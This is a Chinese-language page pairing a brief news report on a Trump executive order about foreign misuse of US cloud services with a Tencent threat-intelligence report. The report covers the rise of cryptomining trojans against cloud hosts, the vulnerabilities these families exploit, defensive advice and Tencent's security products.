据外媒报道，当地时间周二，白宫方面表示，即将卸任的特朗普总统签署了一项行政命令，旨在阻止外国利用云计算产品对美国进行恶意网络行动。这是特朗普总统就职的最后一天。 最先由路透社报道的这项命令赋予美国商务部以制定规则来在外国人利用云计算产品或服务进行网络攻击的情况下禁止美国跟他们在该领域进行交易权力的权力。 这项命令还要求该机构在六个月内为Infrastructure as a Service–一种云计算类型–美国供应商制定规则，从而确认他们与之进行业务往来的外国人的身份并并保留特定记录。 一位高级官员披露，美国官员已经为这项指令运作了近两年时间。但它的推出却是在美国科技公司SolarWinds以侵入联邦政府网络为跳板的大规模黑客活动之后。美国高级官员和国会议员指责俄罗斯发动了大规模的黑客攻击，但克里姆林宫否认了这一指控。 民主党当选总统乔·拜登将于周三将宣誓就职，而他可以轻松撤销特朗普总统任期即将结束时发布的行政命令。对此，拜登的过渡团队方面没有立即回应置评请求。           （消息及封面来源：cnBeta）

一、背景 云主机是企业数字化转型的重要基础设施，承载着重要的数据和服务价值，也逐渐成为了黑客的重点攻击对象。随着虚拟机、云主机、容器等技术的普遍应用，传统安全边界逐渐模糊，网络环境中的主机资产盲点成倍增加，黑客入侵、数据泄露、病毒木马攻击风险随之增加。 与此同时，各类数字加密货币价格迎来暴涨，2020年初至今，比特币价格一度超过了4万美元/BTC，是2019年底的10倍之多，达到了历史最高点，比特币一度摘取2020年度最佳持有资产的头衔。受比特币暴涨影响，各类数字虚拟币市值均有大幅增长，在如此大利益诱惑之下，通过传播挖矿木马来获取数字加密货币（以挖取门罗币最为普遍）的黑产团伙闻风而动，纷纷加入对主机计算资源的争夺之战。 根据腾讯安全威胁情报中心态势感知系统提供的数据，近期针对云主机的挖矿木马呈现成倍增长趋势。由于部分主机未对系统进行合理的访问策略控制、安全风险检查，导致其存在较多的弱口令、未授权访问、远程代码执行漏洞等安全缺陷，黑客团伙利用这些缺陷大规模入侵服务器并植入挖矿木马，再利用被控主机系统的计算资源挖矿数字加密货币获利。 二、威胁情报数据 腾讯安全态势感知数据显示，近期与挖矿相关的恶意样本检出、IP、Domain广度热度，探测到的挖矿威胁数量均有不同程度的上升。 1、腾讯安全智能AI引擎检测到的挖矿木马样本量呈明显上涨 2、腾讯安全态势感知系统检测到挖矿团伙控制的IP、Domain广度也呈上涨趋势 3、腾讯安全智能分析系统部署的探针检测到云上挖矿威胁也有较大幅度上涨 三、近期典型挖矿事件 1、挖矿事件应急处置 腾讯安全工程师会对捕获到的有一定影响力的安全事件进行应急处置，对腾讯安全全系列产品进行安全策略升级，以覆盖最新的威胁防御、威胁检测和威胁清理能力；其中影响范围较大的病毒变种或新病毒家族会对外发布详细的病毒分析报告，给出具体的防御和清理建议，向广大用户和安全同行进行通告和预警。 根据腾讯安全威胁情报中心运营数据，从2020/12/9至2021/1/9间的一个月时间内，上述需要人工参与应急处置的挖矿相关事件从平均每日2例增长到了每日5例，有较明显增长。 2、老挖矿木马家族更加活跃 在处置安全事件过程中我们发现，老牌挖矿木马团伙H2Miner、SystemdMiner非常活跃，并且这些家族分别针对云主机的系统和应用部署特性开发了新的攻击代码： 2020年12月22日，H2Miner挖矿木马家族利用Postgres远程代码执行漏洞CVE-2019-9193攻击传播；2020年12月28日又发现H2Miner挖矿木马家族利用XXL-JOB未授权命令执行漏洞对云主机发起攻击。（参考链接：https://mp.weixin.qq.com/s/koxWEnlBDAfgh18hDl8RhQ） 2020年12月，我们还发现SystemdMiner挖矿木马家族利用Postgres远程代码执行漏洞CVE-2019-9193进行攻击传播。（参考链接：https://mp.weixin.qq.com/s/kkCm0eg1xshxgowHpabRFA） 2020年10月，WatchBogMiner挖矿木马变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机。（参考链接：https://mp.weixin.qq.com/s/zviLvGK3wTnl0iwtszHQlg） 2020年10月，8220挖矿团伙利用Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238、Confluence远程代码执行漏洞CVE-2019-3396攻击传播。（参考链接：https://mp.weixin.qq.com/s/w8dcdv-V7w8MUhADEvJeXA） 3、新挖矿家族层出不穷，新漏洞武器被迅速采用 自2020年11月以来，仅腾讯安全威胁情报中心新发现的感染量超过5000的挖矿木马家族就已超过5个，对应家族的命名、主要入侵方式、估计感染量如下： SuperManMiner：https://mp.weixin.qq.com/s/jl_mSggGf_5NcF_pr55gLw TOPMiner：https://mp.weixin.qq.com/s/9U1V0dkL0AUIPYZWmNSjpA RunMiner：https://mp.weixin.qq.com/s/7SUXrdZ4WdTVenkVcMpZJQ 4SHMiner：https://mp.weixin.qq.com/s/iwtcUsiAOpOtDm79lsOXWw z0Miner：https://mp.weixin.qq.com/s/cyPZpB4zkSQccViM0292Zg MrbMiner：https://mp.weixin.qq.com/s/oq3z6rUcPfmMi0-KHQ3wwQ 其中，腾讯安全团队于2020.11.02日发现挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞（CVE-2020-14882/14883）进行攻击，本次攻击是在Weblogic官方发布安全公告（2020.10.21）之后的15天之内发起，挖矿木马团伙对于新漏洞武器的采用速度之快，由此可见一斑。 4、僵尸网络加入挖矿阵营 2020年11月，腾讯安全威胁情报中心检测到TeamTNT僵尸网络通过批量扫描公网上开放2375端口的云服务器，并尝试利用Docker Remote API未授权访问漏洞对云服务器进行攻击，随后植入挖矿木马。（参考链接：https://mp.weixin.qq.com/s/td6KznnHqwALFwqXdMvUDg） 2020年12月，腾讯安全威胁情报中心发现Prometei僵尸网络变种开始针对Linux系统进行攻击，通过SSH弱口令爆破登陆服务器，之后安装僵尸木马uplugplay控制云主机并根据C2指令启动挖矿程序。Prometei僵尸网络于2020年7月被发现，初期主要以SMB、WMI弱口令爆破和SMB漏洞（如永恒之蓝漏洞）对Windows系统进行攻击传播。（参考链接：https://mp.weixin.qq.com/s/mAKsscAFLHQU_WrbsVbQng） 四、总结 “挖矿木马”开始大规模流行于2017年初，黑客通过网络入侵控制大量计算机并植入矿机程序后，利用计算机的CPU或GPU算力完成大量运算，从而获得数字加密货币。2017年开始爆发之后，挖矿木马逐渐成为网络世界主要的威胁之一。 服务器一旦被挖矿木马团伙攻占，正常业务服务的性能会受到严重影响，挖矿木马感染，也意味着服务器权限被黑客夺取，企业机密信息可能泄露，攻击者也同时具备彻底破坏数据的可能性。 面对越来越严峻的安全挑战，企业应该加大对主机安全的重视程度和建设力度。挖矿木马作为目前主机面临的最普遍威胁之一，是检验企业安全防御机制、环境和技术能力水平的试金石。如何有效应对此类安全威胁，并在此过程中促进企业网络安全能力提升，应当成为企业安全管理人员与网络安全厂商的共同目标。 五、安全防护建议 针对联网主机防护挖矿团伙入侵的一般建议 1.对于Linux服务器SSH、Windows SQL Server等主机访问入口设置高强度的登录密码； 2.对于Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres等应用增加授权验证，对访问对象进行控制。 3.如果服务器部署了Weblogic、Apache Struts、Apache Flink、ThinkPHP等经常曝出安全漏洞的服务器组件，应密切关注相应组件官方网站和各大安全厂商发布的安全公告，根据提示及时修复相关漏洞，将相关组件升级到最新版本。 失陷系统的排查及清除 1、检查有无占用CPU资源接近甚至超过100%的进程，如有找到进程对应文件，确认是否属于挖矿木马，Kill 挖矿进程并删除文件；kill 掉包含下载恶意shell脚本代码执行的进程； 2、检查/var/spool/cron/root、/var/spool/cron/crontabs/root等文件中有无恶意脚本下载命令，有无挖矿木马启动命令，并将其删除； 3、如有发现挖矿相关进程、恶意程序，及时对服务器存在的系统漏洞、弱口令、Web应用漏洞进行排查和修复。 六、腾讯安全解决方案 针对近期挖矿木马家族异常活跃的现状，腾讯安全团队及时响应，腾讯安全全系列产品升级相应的检测、防御规则，确保部署腾讯安全产品的用户不受影响： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）相关流行挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）相关流行挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）相关流行挖矿木马关联的IOCs已支持识别检测； 2）支持相关流行挖矿木马利用的RCE漏洞、未授权访问漏洞、弱口令爆破攻击检测。   有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀相关流行挖矿木马程序； 2）已支持相关流行挖矿木马利用的RCE漏洞、未授权访问漏洞、弱口令爆破攻击检测；   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测相关流行挖矿木马与服务器的网络通信； 2）已支持相关流行挖矿木马利用的RCE漏洞、未授权访问漏洞、弱口令爆破攻击检测。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta